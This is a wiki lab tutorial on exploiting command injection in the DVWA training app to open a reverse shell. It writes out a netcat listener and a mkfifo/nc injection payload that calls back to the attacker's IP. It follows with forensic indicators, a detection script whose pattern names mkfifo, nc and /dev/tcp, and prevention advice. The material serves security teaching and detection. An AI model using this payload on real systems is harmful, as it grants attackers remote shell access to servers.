Hands-on mkfifo attack backdoor in DVWA via Command Injection (en)

From OnnoWiki

Hands-On: Creating a Backdoor via Command Injection in DVWA

Objective: Exploit the command injection vulnerability in DVWA to open a backdoor on the target system.

Prerequisites:

  1. DVWA is set up with security level "Low" on the target system.
  2. You have access to Kali Linux (or any other system with netcat).
  3. You know the IP address of your attack machine.

Note: This tutorial is for educational purposes only. Do not attempt on unauthorized systems.


Step 1: Understanding the Target

  1. Log in to DVWA with default credentials (username: `admin`, password: `password`).
  2. Navigate to Command Injection under the Vulnerabilities section.
    • This page takes an IP address, appends it to a `ping` command and runs the result with a shell. Because the input is not validated before being passed to the shell, anything after a shell metacharacter such as `;` is executed as an additional command on the server.

Step 2: Start a Netcat Listener on the Attacker Machine

To listen for incoming connections, set up a Netcat listener on your machine. Open a terminal in Kali Linux and run:

nc -lvp 4444

This command opens a listener (`-l`) on port 4444 (`-p 4444`) and reports connections verbosely (`-v`). Netcat waits until the target connects back; leave the terminal open.

Step 3: Exploit Command Injection to Create a Backdoor

In DVWA's Command Injection input field, enter the following command:

<Your IP Address>; mkfifo /tmp/pipe; sh /tmp/pipe | nc <Your IP Address> 4444 > /tmp/pipe
  • Replace `<Your IP Address>` with the IP of your attacker machine. The first occurrence is only the argument DVWA hands to its own `ping` command; the second is where `nc` connects to.
  • This command:
    • Uses a semicolon `;` to end the `ping` command that DVWA builds from the input, so the text after it runs as separate commands.
    • Creates a named pipe (`/tmp/pipe`) with `mkfifo` to carry the attacker's input back to the shell. If `/tmp/pipe` is left over from an earlier attempt, `mkfifo` fails; prefix the injection with `rm -f /tmp/pipe;` or choose another name.
    • Starts `sh` reading its commands from `/tmp/pipe`, pipes the shell's standard output into `nc`, and redirects what `nc` receives from the listener back into `/tmp/pipe`, closing the loop. Only standard output travels back; to see error messages as well, use `sh /tmp/pipe 2>&1 | nc ...`.

Step 4: Trigger the Backdoor

Click Submit to execute the command. If successful, the DVWA server connects to your Netcat listener, opening a reverse shell. The browser request will appear to hang: PHP waits for the injected command line to finish, and the `sh | nc` pipeline keeps running until the shell exits.

Step 5: Verify Shell Access

In the Kali terminal, you should see a connection from the DVWA server. You can now execute commands on the server as the web server's user (typically `www-data` on Debian-based systems); confirm this first:

whoami
uname -a

Step 6: Clean Up

When done, type `exit` in the reverse shell. This terminates `sh` on the target, which ends the `nc` connection and lets the hanging DVWA request complete. The fifo remains on disk, so remove it afterwards (from a new injection or from the shell before exiting):

rm /tmp/pipe

Removing the file alone does not close an already established shell: the processes keep the pipe open until the shell exits. Also delete any other files or processes created during testing.

Analysis in Forensics

For forensic analysis, investigate:

  1. Web server logs in `/var/log/apache2` (or similar). Note that DVWA's form submits the `ip` field by POST, so a default access log records only `POST /vulnerabilities/exec/` and not the injected string; the request body is only available if an audit log (for example from a web application firewall or a proxy) captured it. With mod_php, standard error from the injected commands (such as `mkfifo` or `nc` failures) usually lands in the Apache error log.
  2. Network activity: an outbound TCP connection from the web server process to an external address on an unusual port (here 4444), visible with `ss -tnp` or in firewall and NetFlow records.
  3. File system changes, such as a named pipe in `/tmp` (`find /tmp -type p`), and an `sh` process owned by the web server user whose parent is the web server.
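The following shell script is an added example and is not part of the OnnoWiki page. It shows two of the checks above in runnable form: a scanner that URL-decodes request lines and flags shell metacharacters and tool names typical of this payload, and a finder for named pipes. The three log lines are constructed for the example in Apache combined format; the injected request is shown as a GET query string only so that the payload is visible in the sample, since, as noted above, DVWA's real form posts it in the body. The scanner works the same on any decoded request data you do have (a WAF audit log, proxy log or packet capture).

```shell
#!/bin/sh
# Added example (not from the OnnoWiki page): simple forensic checks for a
# mkfifo/nc reverse shell injected through a web form.

# Constructed sample log lines (not real traffic): one benign ping, one request
# carrying the URL-encoded mkfifo payload, one plain page load.
SAMPLE_LOG='10.0.0.9 - - [01/Jan/2024:12:00:00 +0000] "GET /vulnerabilities/exec/?ip=10.0.0.1&Submit=Submit HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:12:00:05 +0000] "GET /vulnerabilities/exec/?ip=10.0.0.9%3Brm+-f+/tmp/pipe%3Bmkfifo+/tmp/pipe%3Bsh+/tmp/pipe+%7C+nc+10.0.0.9+4444+%3E/tmp/pipe&Submit=Submit HTTP/1.1" 200 - "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:12:00:30 +0000] "GET /vulnerabilities/exec/ HTTP/1.1" 200 1520 "-" "Mozilla/5.0"'

# Decode the URL encodings an attacker uses to hide shell syntax. Only the
# characters relevant to command injection are handled; extend as needed.
url_decode() {
    sed -e 's/+/ /g' \
        -e 's/%3[bB]/;/g' -e 's/%7[cC]/|/g' -e 's/%26/\&/g' \
        -e 's/%60/`/g' -e 's/%24/$/g' -e 's/%28/(/g' -e 's/%3[eE]/>/g' \
        -e 's/%2[fF]/\//g' -e 's/%20/ /g'
}

# Print every request line (stdin) that, once decoded, contains a shell
# metacharacter or one of the tools used by this kind of backdoor. A single
# "&" is left alone because it separates ordinary query parameters.
flag_injection_requests() {
    url_decode | grep -E ';|\||&&|`|\$\(|mkfifo|/dev/tcp|[[:space:]]nc[[:space:]]'
}

# Count flagged lines; prints 0 when nothing matches.
count_injection_requests() {
    url_decode | grep -cE ';|\||&&|`|\$\(|mkfifo|/dev/tcp|[[:space:]]nc[[:space:]]'
}

# List named pipes below a directory (the artefact mkfifo leaves behind).
find_fifos() {
    find "$1" -type p 2>/dev/null
}

# Self-contained demonstration of find_fifos on a scratch directory holding one
# regular file and one fifo; returns the fifo's name only.
demo_find_fifos() {
    dir=$(mktemp -d) || return 1
    : > "$dir/notes.txt"
    mkfifo "$dir/pipe"
    find_fifos "$dir" | sed 's#.*/##'
    rm -rf "$dir"
}

# Stand-alone run: show the flagged request, the count, and the fifo found.
printf '%s\n' "$SAMPLE_LOG" | flag_injection_requests
printf '%s\n' "$SAMPLE_LOG" | count_injection_requests
demo_find_fifos
```

On a live system you would point `find_fifos` at `/tmp`, `/var/tmp` and `/dev/shm`, and feed `flag_injection_requests` with the decoded request log, then pivot from any hit to the process list and to outbound connections from the web server user.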

This exercise demonstrates how attackers might exploit web applications to gain unauthorized access. The root cause is passing user input to a shell. Prevent it by validating the field against the format it is meant to hold (here, an IP address) and by avoiding shell execution altogether where possible; limit the damage with egress filtering on the web server, a restricted web server user, and monitoring for unexpected child processes and outbound connections.


Interesting Links